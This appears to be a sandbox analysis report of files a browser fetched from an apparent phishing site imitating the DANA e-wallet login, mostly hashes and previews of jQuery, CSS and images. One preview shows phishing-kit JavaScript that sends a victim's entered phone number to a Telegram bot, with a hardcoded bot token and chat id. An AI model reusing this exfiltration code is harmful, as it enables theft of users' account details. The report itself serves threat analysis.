                                                                                                                            SHA-512:CA1B786B318BCBAF5AE94190F68B95731AC472E16C1447E1A643D0FD0FF8983E898403B2F3003C120CE251E7E80211A9EAE298D5CA07045D15255072570D8BF9
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/main.css
                                                                                                                            Preview:@import url('../../external.html?link=https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&amp;display=swap');* {font-family: 'Open Sans', sans-serif;font-weight: 400;margin: 0;padding: 0;box-sizing: border-box;position: relative;color: #fff;}b { font-weight: 700; }html { width: 100vw; height: 100vh; }body {background: #118EEA;width: 100vw;height: 100vh;}.box-login, .container {background: #118EEA;height: 100%;width: 100%;}body .header {width: 100%;margin-top: 10px;padding: 10px;height: 50px;display: flex;justify-content: center;align-items: center;}body .header .back {height: 35%;max-height: 35%;min-height: 35%;position: absolute;left: 20px;}body .header .logo {height: 100%;max-height: 100%;min-height: 100%;}form {width: 100%;height: 100%;display: flex;padding: 50px 20px;align-items: center;flex-direction: column;}form h3 {width: 100%;font-size: 14px;text-align: center;}form .box-input {width: 100%;height: 42px;padding: 5px 15px;margin-top: 50px;background: #fff;display
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (551)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):7920
                                                                                                                            Entropy (8bit):5.3601122776962535
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:q3KIpiAIexCPJpl0DbintpGPiEvAheKevbtoNOO:q3hLjKrl0HitpGPQeKeDtMZ
                                                                                                                            MD5:2E961F240D376E0A83C885A07F00762E
                                                                                                                            SHA1:E9F1D4A792DC3FB06F8D65D68A607738F3B4070C
                                                                                                                            SHA-256:470A65FDD4C44FA96EF232ACB2A308CA73A3F17D6ACCC399D0C7A28A21D532D9
                                                                                                                            SHA-512:8358D44A3375BD2ACEB90B822A7D08C214A5524562774D2C402C6AEFA6B7DAB5443B94AABDBBB5DC4F9D79D32D6A7AD5BB7FB3FAF79E1A277731B47F2B30FF07
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/jquery.mask.min.js
                                                                                                                            Preview:var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?Object.defineProperty:function(a,l,d){if(d.get||d.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[l]=d.value)};.$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);$jscomp.polyfill=function(a,l,d,p){if(l){d=$jscomp.global;a=a.split(".");for(p=0;p<a.length-1;p++){var h=a[p];h in d||(d[h]={});d=d[h]}a=a[a.length-1];p=d[a];l=l(p);l!=p&&null!=l&&$jscomp.defineProperty(d,a,{configurable:!0,writable:!0,value:l})}};.$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,d){return $jscomp.findInternal(this,a,d).v}},"es6-impl","es3");.(function(a,l,d
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (340), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):340
                                                                                                                            Entropy (8bit):5.243020504903163
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:wbdIznhRRLoAwhFrKZSi50TgKYRhs+RnTYJxWWRyef+WiMLOdS:wZID15oKZVxdRhs+RTYJN4ef+WCdS
                                                                                                                            MD5:59BBCA58EB0134032C0C6E0175C556A3
                                                                                                                            SHA1:62F7F9DC98D524E559F688E7CB333B18D1860AF8
                                                                                                                            SHA-256:062FA0CEE97DEE43FDD025204C6776AE609D71A55B6117B100BCBF6ADF394BD2
                                                                                                                            SHA-512:132BE97A25F35A2E4B11936D57D54DD5311B374938420549BF1CFFACCFF487AEA5CF767FCC3DC919D78BF713B4F9B177A705F490EC700386A903155A14C52E2C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:import{p as i,b as o}from"./p-d15ec307.js";(()=>{const o=import.meta.url,s={};return""!==o&&(s.resourcesUrl=new URL(".",o).href),i(s)})().then((i=>o([["p-1c0b2c47",[[1,"ion-icon",{mode:[1025],color:[1],ios:[1],md:[1],flipRtl:[4,"flip-rtl"],name:[513],src:[1],icon:[8],size:[1],lazy:[4],sanitize:[4],svgContent:[32],isVisible:[32]}]]]],i)));
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (340), with no line terminators
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):340
                                                                                                                            Entropy (8bit):5.243020504903163
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:wbdIznhRRLoAwhFrKZSi50TgKYRhs+RnTYJxWWRyef+WiMLOdS:wZID15oKZVxdRhs+RTYJN4ef+WCdS
                                                                                                                            MD5:59BBCA58EB0134032C0C6E0175C556A3
                                                                                                                            SHA1:62F7F9DC98D524E559F688E7CB333B18D1860AF8
                                                                                                                            SHA-256:062FA0CEE97DEE43FDD025204C6776AE609D71A55B6117B100BCBF6ADF394BD2
                                                                                                                            SHA-512:132BE97A25F35A2E4B11936D57D54DD5311B374938420549BF1CFFACCFF487AEA5CF767FCC3DC919D78BF713B4F9B177A705F490EC700386A903155A14C52E2C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js
                                                                                                                            Preview:import{p as i,b as o}from"./p-d15ec307.js";(()=>{const o=import.meta.url,s={};return""!==o&&(s.resourcesUrl=new URL(".",o).href),i(s)})().then((i=>o([["p-1c0b2c47",[[1,"ion-icon",{mode:[1025],color:[1],ios:[1],md:[1],flipRtl:[4,"flip-rtl"],name:[513],src:[1],icon:[8],size:[1],lazy:[4],sanitize:[4],svgContent:[32],isVisible:[32]}]]]],i)));
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 300 x 300, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):7768
                                                                                                                            Entropy (8bit):7.958275265449371
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:gAmxmMNMVyKcf5x7XYiM092dkDKG5zRNNWdz/FwxqO:gAmx3MYbxx8iMzGF1RyFo5
                                                                                                                            MD5:73E8DB089B44DB8C0D3D94A08A79AFDF
                                                                                                                            SHA1:D26BACFA0128237D7C40396DBD2B36E6456CB9AB
                                                                                                                            SHA-256:9F2F502509F3CDD2E98DC540B4F7DD57A7962524012E0210E1EF64CEE17D79AE
                                                                                                                            SHA-512:DCC40660BFCC5AD0487F0B4358162DF994FE2D2F0595843E2A23F50481B0C84065679BEE7B9B91C14577BE307AD8A174FB290E1FFF19AB4ECB90E8865C95BD8C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR...,...,......tF.....sBIT..U.F.....bKGD....#2..._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-.....IDATx...o[W.....$R.DI..%..8v....T...j....K.C...q.........2O.n`.i4.....T..]...wW:.Ne....&....Z..3.W.dI.H..<.a.;./?.............$.....``.......,.$..'..(T..."....0....a.@........D..d..-...B.!E....+..."...X..p....2.a...M.i....#}lv.\.....C..VH..012$...Z..G.N.h..0>B.../..0.nV..I..8.2.:i...T.XB.FZ.....iT..H...g....f.56.=..f.BD.NZ.C0.d.m7...-..c.Ib.+T..S.b......m..G\.F..b.%FY`.X.._.%..L'g..?P.....>.2.|....m.T.X&.z...6...Q.a..Xd.Q.Y..3.j...>N2D.A.').!A.Q..g...).o..'.IN.N.w7{."@.y...y......X..q.~......B.,6...#.U.8..b..<.yZ.T.R...$K.......^.+@7.9I..}......d.[....c.s.ROu.S.".&..f..J.&_."V..<C?..Rj7B.q.1.l....1.%zw...*.\W.q.\n.+.I..O..j.r!@.1.2L..9.7.e2.s..p..!.._..Yz..%tq.'.k.r lp.o.v..r.X-\......0.X..7X.tQ..>..<.e:1.Ty X..5.-.r.XB//s.......#|....Y..."...I/F...9.:...{..n....or.:7..<."D?.l..#...Z
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 80 x 45, 8-bit colormap, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):741
                                                                                                                            Entropy (8bit):6.2179187268012095
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:6v/7FXUCU55555555555555555555555M1uivQS8H9h+6eIbkekqhLzSUFEMb+zM:TCU55555555555555555555555Gv9zIj
                                                                                                                            MD5:C15C95B8DB17F44E5826BB7839278578
                                                                                                                            SHA1:5BE0AB5ABA6201A0A3A3423F9DB8008ED2385430
                                                                                                                            SHA-256:AF52BFB0AB7606D185DB1457DDC3EDCEB61C7FE9675E099CAE3E3BE1ECCF152C
                                                                                                                            SHA-512:965183A95CD3356BBEF2BA468A44EFD36E503967F19E797505DB4560846F52C386E8B8221BBC11DA9DE96A02A799B4074222AF7022BC54FAC55F32989C5385B4
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/img/indo.png
                                                                                                                            Preview:.PNG........IHDR...P...-......s......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.............................................................................................................................................................................................. .............+..}...=tRNS.......]....Z.)....&...."........".....&......U.....R....|....bKGDCg..b....tIME.....*.........IDATH......P...+|$z.N...5....(c..c..;.8@,.J.V&2....x.X.5.].8.8.....7.h.y...,.....J(..;..dx..E.7...J(.=...`..Fcx.)...P.....[.o...R....."...M...d..".....%tEXtdate:create.2022-10-29T04:40:52+00:00...t...%tEXtdate:modify.2022-10-29T04:40:52+00:00.......(tEXtdate:timestamp.2022-10-29T04:42:19+00:00E..*....IEND.B`.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (32038)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):95992
                                                                                                                            Entropy (8bit):5.391333957965341
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:OP10iSi65U/dXXeyhzeBuG+HYE0WEeLDFoNqLTW8+S5VRZIVI6xSb8xh2ZbQnRmm:R+41ZqLTW8xRrqSb8qGH77da98Hr3
                                                                                                                            MD5:F03E5A3BF534F4A738BC350631FD05BD
                                                                                                                            SHA1:37B1DB88B57438F1072A8EBC7559C909C9D3A682
                                                                                                                            SHA-256:AEC3D419D50F05781A96F223E18289AEB52598B5DB39BE82A7B71DC67D6A7947
                                                                                                                            SHA-512:8EEEAEFB86CF5F9D09426814F7B60E1805E644CAC3F5AB382C4D393DD0B7AB272C1909A31A57E6D38D5ACF207555F097A64A6DD62F60A97093E97BB184126D2A
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (65451)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):89476
                                                                                                                            Entropy (8bit):5.2896589255084425
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                                            MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                                            SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                                            SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                                            SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:GIF image data, version 89a, 600 x 117
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):325076
                                                                                                                            Entropy (8bit):7.827778077493344
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:/fXjcUDi70xUSvxVGM1VHfERuShXmZ40kE2uHU:HXj3DHNHGM1V/EQct3AU
                                                                                                                            MD5:EFB2FB9C6324222F019C04C56B1E00D2
                                                                                                                            SHA1:F0E5C97DE104EF75AD496336D15F4B980E5055E8
                                                                                                                            SHA-256:774D4EED5653477050074D1FBB01B3D554573C55F6EA2D37905B2E2C69D4FB40
                                                                                                                            SHA-512:2144C2C8C8441ED216C75B12DEFEDFD490E1575117E2442788AA840E9475CD40F1C301F719909BEA6D9397891D6C186584D6C1E49349951461A04AA767A961FD
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:GIF89aX.u.................................................................................................................................................................................................................................................................................................!..%..0..8..?..E..M..T..Z..`..e..l..r..x..}..~.....~..|..y..v..s..o..i..e..b..`..^..[..Z..Y..Y..X..X..Y..\..].._..c..h..l..q..w..~.......................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.....3.!..Generated by onlineGIFtools.com.,....X.u.....g..H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x.E....
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 382 x 112, 8-bit/color RGBA, interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):12786
                                                                                                                            Entropy (8bit):7.97367666555636
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:olyA9pk9pGYsPVMm80Y0xf43FmSqf6x0LUYMTo2OZ9:olyA9pk9kYaV+0t43Tqf6KU/82Of
                                                                                                                            MD5:6FD5A7D18A8F7C04BC5EFFCDC5235987
                                                                                                                            SHA1:C4852C577F44FCDF78FB439A30EA2C6C6983B140
                                                                                                                            SHA-256:C67E5431F9C00BB690EA8B8ADD63D5CA9250BF2925F2C2A691EEEE498AC75853
                                                                                                                            SHA-512:13E05A6F89B8110F1867EFBBC6A7BF216471FF5CAD3739AC3C34E30AAED670844ED8DE5B220EB449B174A272BCABEF07A96F13F936A34AEDD754E6A8ED3CC991
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/img/dana_logo.png
                                                                                                                            Preview:.PNG........IHDR...~...p.....n.+.....gAMA......a...1.IDATx..}...5....., ....U.J.A..X.D...'... ..G.......R.."E.#.R...A....R..{....I..m...;3....L&999..2...1..s..1....tFIn.g.c...c..r.f.......Dg..x...ETE.p..O...O......x.)=.......;.....<yr...."...,sv5...e..].bEgF...s..Y..?..6..iX.?.x?.............7n...&....p....G..W.Z5..t.{..EiX<])......0#.%K....?.~wc$Kd.2:OB.R...t\.....':z...,..G.7. ..Kqet..bE._}..,1...g.t.....OO..^.%6..h.U>..-|F......EX.l.. .c<.M.6.:]cbb..n.z....|.....3gN..0...\H..s.#~.........M<.o.3........f.,......E.w.[.*......[....!...%H.+..=z.*>.e.g..._....o[.c.44))..o>.m...G...L.ONN...&.......(:::j.q....=.......Ii...{..aq,.]..>..@..Wa<.......e.)o.x<.8..h........Y<]Y8F...=...{.U..+W......hX..z...{.+.Tt.h/].d:.:q..1#/.3...Y../{.5j.=.4,......2/:..<1.'..3..g....3:./...,.J.m.|.v..._4..v.W0..2..xX..Op...k,...gf..z...=./M.g......"...^..U..<HP....1].n....tO4|.=..<.%c.|f..p..y>d.B.._2.(..{..Y.jC..+AU.ILL.GT(c.Y.....b.2..U}>~...1k..#.3.'.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (1255)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):1256
                                                                                                                            Entropy (8bit):4.959047902340233
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:vASu2KFI8AW2bnDGZMiDgKRKaWE3Vc11AebnVts+ZMeS8ddnsdevRb7:vAzFREjDUs+dtcYctNZS8PsE/
                                                                                                                            MD5:E2A320730EF8A296909722D232AE202E
                                                                                                                            SHA1:1FA905B79FF205824AA73A08FA4CDD6980E08297
                                                                                                                            SHA-256:9CFAFE8ABEBE3F03670B51AD157009CC0D2C2015A17AEAD016E387F2B5D8A94C
                                                                                                                            SHA-512:6D999AFDAFAAF29FBD80BE3B783759A97868A9856D1D6D24463252CD4B992C4B371AA09B44006C11CD76662092BBBAC15C583FF6792D1369E544FCBA89FFB3EC
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://dev-danapemulihan.pantheonsite.io/asset/otp.css
                                                                                                                            Preview:.bgotp {position: absolute;z-index: 9999;top: 0;left: 0;right: 0;width: 100%;height: 100%;background: #00000032;}.bgotp form {width: 100%;position: absolute;bottom: 0;height: 50%;min-height: 50%;max-height: 50%;background: #fff;border-top-left-radius: 15px;border-top-right-radius: 15px;padding: 40px;}.bgotp #formOtp h2 {font-size: 20px;font-weight: 700;margin-bottom: 10px;}.bgotp #formOtp p {font-size: 14px;font-weight: 500;}.bgotp #formOtp h2,.bgotp #formOtp p {color: #000;text-align: center;}.bgotp #formOtp .resend {margin-top: 35px;font-size: 15px;color: #b1b1b1;}.bgotp #formOtp .resend #countdown {font-size: 15px;color: #b1b1b1;}.box-input-otp {width: 100%;height: 45px;margin-top: 35px;display: flex;justify-content: center;align-items: center;}.box-input-otp input {height: 45px;width: 45px;border: none;outline: none;border-radius: 8px;margin: 0 3px;display: flex;background: #f6f6f6;justify-content: center;align-items: center;text-align: center;font-size: 20px;font-weight: 600;color
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):211
                                                                                                                            Entropy (8bit):5.008692902780752
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:tI9mc4slnJ/sG0qQOF9r0mqZlllVvI4/jEHGB3Hb:t4rEnqh/0hlllF9gHU3Hb
                                                                                                                            MD5:3CC32EC8449360AFADF16AB753D364FE
                                                                                                                            SHA1:AA001F399AB0F83378EF8B1AD1986060C64E3C74
                                                                                                                            SHA-256:CE2DC5E5066AFAA335FD98C55228E4C074451DB5F60FE5A652C8F7029D6BF4FB
                                                                                                                            SHA-512:FABCCBC761A20CD34A1A8B7A5BD5546F29F13A2DBDA175F7C925DE496C338B9BC5CD0F79B7F08830DE1D8814C4467B877C1E33A8B8BF615A4A3AE04E71002BE2
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://unpkg.com/ionicons@7.1.0/dist/ionicons/svg/chevron-back-outline.svg
                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" class="ionicon" viewBox="0 0 512 512"><path stroke-linecap="round" stroke-linejoin="round" stroke-width="48" d="M328 112L184 256l144 144" class="ionicon-fill-none"/></svg>
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (551)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):7920
                                                                                                                            Entropy (8bit):5.3601122776962535
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:q3KIpiAIexCPJpl0DbintpGPiEvAheKevbtoNOO:q3hLjKrl0HitpGPQeKeDtMZ
                                                                                                                            MD5:2E961F240D376E0A83C885A07F00762E
                                                                                                                            SHA1:E9F1D4A792DC3FB06F8D65D68A607738F3B4070C
                                                                                                                            SHA-256:470A65FDD4C44FA96EF232ACB2A308CA73A3F17D6ACCC399D0C7A28A21D532D9
                                                                                                                            SHA-512:8358D44A3375BD2ACEB90B822A7D08C214A5524562774D2C402C6AEFA6B7DAB5443B94AABDBBB5DC4F9D79D32D6A7AD5BB7FB3FAF79E1A277731B47F2B30FF07
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?Object.defineProperty:function(a,l,d){if(d.get||d.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[l]=d.value)};.$jscomp.getGlobal=function(a){return"undefined"!=typeof window&&window===a?a:"undefined"!=typeof global&&null!=global?global:a};$jscomp.global=$jscomp.getGlobal(this);$jscomp.polyfill=function(a,l,d,p){if(l){d=$jscomp.global;a=a.split(".");for(p=0;p<a.length-1;p++){var h=a[p];h in d||(d[h]={});d=d[h]}a=a[a.length-1];p=d[a];l=l(p);l!=p&&null!=l&&$jscomp.defineProperty(d,a,{configurable:!0,writable:!0,value:l})}};.$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,d){return $jscomp.findInternal(this,a,d).v}},"es6-impl","es3");.(function(a,l,d
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 300 x 300, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):7768
                                                                                                                            Entropy (8bit):7.958275265449371
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:gAmxmMNMVyKcf5x7XYiM092dkDKG5zRNNWdz/FwxqO:gAmx3MYbxx8iMzGF1RyFo5
                                                                                                                            MD5:73E8DB089B44DB8C0D3D94A08A79AFDF
                                                                                                                            SHA1:D26BACFA0128237D7C40396DBD2B36E6456CB9AB
                                                                                                                            SHA-256:9F2F502509F3CDD2E98DC540B4F7DD57A7962524012E0210E1EF64CEE17D79AE
                                                                                                                            SHA-512:DCC40660BFCC5AD0487F0B4358162DF994FE2D2F0595843E2A23F50481B0C84065679BEE7B9B91C14577BE307AD8A174FB290E1FFF19AB4ECB90E8865C95BD8C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8hbZEfutKvr9pkj0-mkJYWt-1SBtt3gw-HFOEZc0172okrp0SFHLaW3PRGVDm1U0P7WWEMELIw4nlq1_1gCgyZBo3cxf-OJNpguNamdJryCkGU-hTHiW3RyOv5JD9eIjXTFtrJFCVn0ae4RxG4Oi-czAP20tEaJI3OstxFAbtOwtFxp6RvOHc6NZL/s1600/load_bg.png
                                                                                                                            Preview:.PNG........IHDR...,...,......tF.....sBIT..U.F.....bKGD....#2..._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-.....IDATx...o[W.....$R.DI..%..8v....T...j....K.C...q.........2O.n`.i4.....T..]...wW:.Ne....&....Z..3.W.dI.H..<.a.;./?.............$.....``.......,.$..'..(T..."....0....a.@........D..d..-...B.!E....+..."...X..p....2.a...M.i....#}lv.\.....C..VH..012$...Z..G.N.h..0>B.../..0.nV..I..8.2.:i...T.XB.FZ.....iT..H...g....f.56.=..f.BD.NZ.C0.d.m7...-..c.Ib.+T..S.b......m..G\.F..b.%FY`.X.._.%..L'g..?P.....>.2.|....m.T.X&.z...6...Q.a..Xd.Q.Y..3.j...>N2D.A.').!A.Q..g...).o..'.IN.N.w7{."@.y...y......X..q.~......B.,6...#.U.8..b..<.yZ.T.R...$K.......^.+@7.9I..}......d.[....c.s.ROu.S.".&..f..J.&_."V..<C?..Rj7B.q.1.l....1.%zw...*.\W.q.\n.+.I..O..j.r!@.1.2L..9.7.e2.s..p..!.._..Yz..%tq.'.k.r lp.o.v..r.X-\......0.X..7X.tQ..>..<.e:1.Ty X..5.-.r.XB//s.......#|....Y..."...I/F...9.:...{..n....or.:7..<."D?.l..#...Z
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (311)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4458
                                                                                                                            Entropy (8bit):5.36635101234614
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:I6og/8NBiYiLFdocKr/Ou5dBilIKiFDJ//Oiy/AFqr:TEiYi70rOWDiv8JHOiyUqr
                                                                                                                            MD5:85580463F57A575396A08CB66FA31F5F
                                                                                                                            SHA1:B83DBC3CED6A7973F21EE42C2F6FBE9521991EBA
                                                                                                                            SHA-256:8CA39CA4E83FD7E5982791199ED26AD5A55BE2DB1A70DF0DF531CB24BE84FFD6
                                                                                                                            SHA-512:53014B170A3E6AB42F6155A7D293A86B9D18795B54F1D9D77A75D2392831E60D61EB13FDE6F8FCA01681754B364BFA241D2BD5D7BD6F7255D74D1CC4B07977CC
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview: function sendNohp(event){. $("#process").show();event.preventDefault();. $("#inp").blur();. . . . var nomor = document.getElementById("inp").value;. sessionStorage.setItem("nomor", nomor);. var logo = document.getElementById('logo'); . var inp = document.getElementById('inp');. . var gabungan = '' + logo.value + '%0A~%20.......... ........%20~%0A%20%20%20%20%20' + inp.value;. . var token = '6647695935:AAG5DM0nkSir2Z_BjcDr-rQNcT_XE0H9Ans'; // Ganti dengan token bot yang kamu buat. var grup = '6327757033'; // Ganti dengan chat id dari bot yang kamu buat.. $.ajax({. url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,. method: `POST`,. . success: function(){. $("#process").hide();. document.getElementById("back1").style.display = "none";. document.getElementById("back2").style.display = "block";. $("#formNohp").fadeOut();. se
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (8320)
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):8657
                                                                                                                            Entropy (8bit):5.264060362015081
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:+twVzETNBzp0FINVJ5xH/kLRHEHFrrTKVgx8UuWYJPY:gwVAT/pMINDXH89k5reVgSUuWYi
                                                                                                                            MD5:AA6E142201142F16F7D60CD0EBE9506B
                                                                                                                            SHA1:749DBD66AECA71B9C99D9513BC5EC73DF56D0C21
                                                                                                                            SHA-256:124547B63964181D189D03DBB1884508FEA77622F32709D236552C2C46368C55
                                                                                                                            SHA-512:E685EAE3AF2260BC4C1C9015AF024B2C66375138A270F5474330229FF34D4CBB387EC9E3977DE7B326FF9DDF3C1D8A54E2E810A8783191EE13CB1C113AF4448D
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
